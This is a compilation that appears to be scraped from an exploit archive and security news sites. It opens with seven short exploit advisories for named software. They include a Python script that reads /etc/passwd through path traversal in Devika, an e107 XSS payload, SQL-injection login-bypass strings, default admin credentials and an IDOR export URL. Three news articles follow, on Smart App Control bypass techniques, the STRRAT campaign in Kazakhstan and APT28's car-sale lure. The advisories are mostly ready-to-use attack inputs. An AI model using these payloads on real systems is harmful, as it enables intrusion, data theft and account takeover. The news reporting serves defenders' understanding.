Genexus Protection Server version 9.7.2.10 suffers from an unquoted service path vulnerability.

    #Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path#Exploit Author : SamAlucard#Exploit Date: 2024-07-31#Vendor : Genexus#Version : Genexus Protection Server 9.7.2.10#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;#Vendor Homepage :  https://www.genexus.com/es/#Tested on OS: Windows 10 Pro#Analyze PoC :==============C:\>sc qc protsrvservice[SC] QueryServiceConfig CORRECTONOMBRE_SERVICIO: protsrvservice        TIPO               : 10  WIN32_OWN_PROCESS        TIPO_INICIO        : 2   AUTO_START        CONTROL_ERROR      : 1   NORMAL        NOMBRE_RUTA_BINARIO: C:\Program Files(x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe        GRUPO_ORDEN_CARGA  :        ETIQUETA           : 0        NOMBRE_MOSTRAR     : ProtSrvService        DEPENDENCIAS       : RPCSS        NOMBRE_INICIO_SERVICIO: LocalSystem

Genexus Protection Server 9.7.2.10 Unquoted Service Path

Devika version 1 suffers from a path traversal vulnerability.

    # Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter# Google Dork: N/A# Date: 2024-06-29# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/X)# Vendor Homepage: https://devikaai.co/# Software Link: https://github.com/stitionai/devika# Version: v1# Tested on: Windows 11 Home Edition# CVE: CVE-2024-40422#!/usr/bin/pythonimport argparseimport requestsdef exploit(target_url):    url = f'http://{target_url}/api/get-browser-snapshot'    params = {        'snapshot_path': '../../../../etc/passwd'    }    response = requests.get(url, params=params)    print(response.text)if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)    args = parser.parse_args()    exploit(args.target)

Devika 1 Path Traversal

e107 version 2.3.3 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : e107 v2.3.3 XSS Vulnerability                                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://unlimited.dl.sourceforge.net/project/e107/e107/e107%20v2.3.3/e107_2.3.3_full.zip?viasf=1                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1[+] LOgin : http://127.0.0.1/233/e107_admin/[+] http://127.0.0.1/233/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

e107 2.3.3 Cross Site Scripting

Codeprojects E-Commerce version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Codeprojects E-Commerce v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/?s=Ecommerce                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@admin.com & pass = password[+] https://www/127.0.0.1/demo/comdeptcmru.acth/59143214/admin/products.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Codeprojects E-Commerce 1.0 Insecure Settings

Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Blog Site 1.0 Auth By Pass Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1//blog/admin/index.php?page=manage_postGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 SQL Injection

Best Courier Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Best Courier Management System v1.0 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user : 'or''='@gmail.com & pass = 'or''='[+] Panel : http://127.0.0.1/gaatitrack/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Best Courier Management System 1.0 SQL Injection

Appointment Scheduler version 4.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v4.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/AppointmentSchedulerDe/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 4.0 Insecure Direct Object Reference

Cybersecurity researchers have uncovered design weaknesses in Microsoft's Windows Smart App Control and SmartScreen that could enable threat actors to gain initial access to target environments without raising any warnings.
Smart App Control (SAC) is a cloud-powered security feature introduced by Microsoft in Windows 11 to block malicious, untrusted, and potentially unwanted apps from being run

Threat Intelligence / Vulnerability

Cybersecurity researchers have uncovered design weaknesses in Microsoft's Windows Smart App Control and SmartScreen that could enable threat actors to gain initial access to target environments without raising any warnings.

Smart App Control (SAC) is a cloud-powered security feature introduced by Microsoft in Windows 11 to block malicious, untrusted, and potentially unwanted apps from being run on the system. In cases where the service is unable to make a prediction about the app, it checks if it's signed or has a valid signature so as to be executed.

SmartScreen, which was released alongside Windows 10, is a similar security feature that determines whether a site or a downloaded app is potentially malicious. It also leverages a reputation-based approach for URL and app protection.

"Microsoft Defender SmartScreen evaluates a website's URLs to determine if they're known to distribute or host unsafe content," Redmond notes in its documentation.

"It also provides reputation checks for apps, checking downloaded programs and the digital signature used to sign a file. If a URL, a file, an app, or a certificate has an established reputation, users don't see any warnings. If there's no reputation, the item is marked as a higher risk and presents a warning to the user."

It's also worth mentioning that when SAC is enabled, it replaces and disables Defender SmartScreen.

"Smart App Control and SmartScreen have a number of fundamental design weaknesses that can allow for initial access with no security warnings and minimal user interaction," Elastic Security Labs said in a report shared with The Hacker News.

One of the easiest ways to bypass these protections is get the app signed with a legitimate Extended Validation (EV) certificate, a technique already exploited by malicious actors to distribute malware, as recently evidenced in the case of HotPage.

Some of the other methods that can be used for detection evasion are listed below -

*   Reputation Hijacking, which involves identifying and repurposing apps with a good reputation to bypass the system (e.g., JamPlus or a known AutoHotkey interpreter)

*   Reputation Seeding, which involves using an seemingly-innocuous attacker-controlled binary to trigger the malicious behavior due to a vulnerability in an application, or after a certain time has elapsed.

*   Reputation Tampering, which involves altering certain sections of a legitimate binary (e.g., calculator) to inject shellcode without losing its overall reputation

*   LNK Stomping, which involves exploiting a bug in the way Windows shortcut (LNK) files are handled to remove the mark-of-the-web (MotW) tag and get around SAC protections owing to the fact that SAC blocks files with the label.

"It involves crafting LNK files that have non-standard target paths or internal structures," the researchers said. "When clicked, these LNK files are modified by explorer.exe with the canonical formatting. This modification leads to removal of the MotW label before security checks are performed."

"Reputation-based protection systems are a powerful layer for blocking commodity malware," the company said. "However, like any protection technique, they have weaknesses that can be bypassed with some care. Security teams should scrutinize downloads carefully in their detection stack and not rely solely on OS-native security features for protection in this area."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Flaws in Windows Smart App Control and SmartScreen

Organizations in Kazakhstan are the target of a threat activity cluster dubbed Bloody Wolf that delivers a commodity malware called STRRAT (aka Strigoi Master).
"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.
The cyber attacks employ

Network Security / Threat Intelligence

Organizations in Kazakhstan are the target of a threat activity cluster dubbed **Bloody Wolf** that delivers a commodity malware called STRRAT (aka Strigoi Master).

"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.

The cyber attacks employ phishing emails as an initial access vector, impersonating the Ministry of Finance of the Republic of Kazakhstan and other agencies to trick recipients into opening PDF attachments.

The file purports to be a non-compliance notice and contains links to a malicious Java archive (JAR) file as well as an installation guide for the Java interpreter necessary for the malware to function.

In an attempt to lend legitimacy to the attack, the second link points to a web page associated with the country's government website that urges visitors to install Java in order to ensure that the portal is operational.

The STRRAT malware, hosted on a website that mimics the website of the Kazakhstan government ("egov-kz\[.\]online"), sets up persistence on the Windows host by means of a Registry modification and runs the JAR file every 30 minutes.

What's more, a copy of the JAR file is copied to the Windows startup folder to ensure that it automatically launches after a system reboot.

Subsequently, it establishes connections with a Pastebin server to exfiltrate sensitive information from the compromised machine, including details about operating system version and antivirus software installed, and account data from Google Chrome, Mozilla Firefox, Internet Explorer, Foxmail, Outlook, and Thunderbird.

It's also designed to receive additional commands from the server to download and execute more payloads, log keystrokes, run commands using cmd.exe or PowerShell, restart or shut down the system, install a proxy, and remove itself.

"Using less common file types such as JAR enables the attackers to bypass defenses," BI.ZONE said. "Employing legitimate web services such as Pastebin to communicate with the compromised system makes it possible to evade network security solutions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Kazakh Organizations Targeted by 'Bloody Wolf' Cyber Attacks

The scheme, from the group also known as APT28, involves targeting Eastern European diplomats in need of personal transportation and tempting them with a purported good deal on a Audi Q7 Quattro SUV.

Source: Uwe Deffner via Alamy Stock Photo

A prolific Russian threat actor known as Fighting Ursa is targeting diplomats through a used-car sale email scheme that then distributes HeadLace backdoor malware.

The gambit involves downloading a .zip file supposedly containing car images of an Audi Q7 Quattro SUV that's been outfitted for diplomatic use; but in fact, the files are executables whose .exe extensions are hidden by default in Microsoft Windows.

The photos of the vehicle are accompanied by a Romanian phone number and a contact at the Southeast European Law Enforcement Center to lend the ad additional credibility.

Fighting Ursa (aka APT28, Fancy Bear, and Sofacy) has adopted the tactic from other Russian threat actors, according to a report on the attack published by Palo Alto Networks' Unit 42.

In July 2023, Unit42 reported on the Russian threat actor Cloaked Ursa, which was using a similar lure — that time a used BMW sedan in Kyiv — to target diplomats working at embassies in Ukraine.

"These lures tend to resonate with diplomats and get targets to click on the malicious content," the blog post noted.

**"Audi" Cyberattack Routine Drives Espionage**

The attack chain begins with the use of the legitimate, free service known as "webhook" to host a malicious HTML page — a tactic that Unit 42 noted is often associated with APT28.

This page then determines if the target machine is running Windows. If it is, a .zip archive is offered for download. If the system is not Windows-based, the user is redirected to a decoy image.

Inside the .zip archive are three files: a Windows calculator executable disguised as an image file, a malicious dynamic link library (DLL), and a batch script.

The calculator executable is used to load the malicious DLL, which then runs the batch script.

The batch script then executes a command to retrieve a file from another webhook site URL, saves it in the downloads folder, renames it for execution, and then deletes it afterward to cover the attack’s tracks. That file contains the HeadLace backdoor, which establishes persistent access to a victim's machine in order to set the stage for follow-on data theft, reconnaissance, and surveillance activities.

"While the infrastructure used by Fighting Ursa varies for different attack campaigns, the group frequently relies on these freely available services \[like webhook\]," a Unit 42 post explained. "Furthermore, the tactics from this campaign fit with previously documented Fighting Ursa campaigns, and the HeadLace backdoor is exclusive to this threat actor."

**Disabling Hide File Extension Options**

Roger Grimes, data-driven defense evangelist at KnowBe4, explains that for nearly as long as Windows has been around, it has automatically hidden the file extension of dozens of commonly used files, such as .exe, .scr, .dll, etc.

"This allows an attacker to create a file — for example, 'carphotos.jpg.exe' — that appears to most Windows users as carphotos.jpg," he explains.

For the real file extension not to be hidden, a user must intentionally disable the "hide file extensions" option in Windows, often having to do so in multiple places.

"Why Microsoft continues to allow hiding file extensions to be the default setting for decades is beyond me, as it is responsible for many tens of millions of exploitations," Grimes says. "It's far past the time for Microsoft to disable this dangerous default."

Microsoft did not immediately respond to a request for comment.

**Fighting Ursa: A Very Active Russian Cyber-Threat Actor**

The hacking group, which most researchers track as APT28, has a long and infamous history as the perpetrators of US election interference in 2016, the NotPetya attacks, the Olympic Destroyer effort, and other high-profile cyber offensives.

More recently, it has targeted Ukrainian government bodies with spear-phishing emails posing as Windows Update guides to trick recipients into executing malicious PowerShell commands.

And in 2022, it disseminated a malicious document exploiting the now-patched CVE-2022-30190 flaw through phishing emails to Ukrainian users. The document, titled “Nuclear Terrorism: A Very Real Threat.rtf,” aimed to exploit concerns about the war in Ukraine escalating into a nuclear disaster.

The threat group has also targeted Ukraine's energy infrastructure, and recently built GooseEgg, a custom tool used to exploit CVE-2022-38028 in attacks directed toward Ukraine, Western Europe, and North America.

**About the Author**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Tag

#windows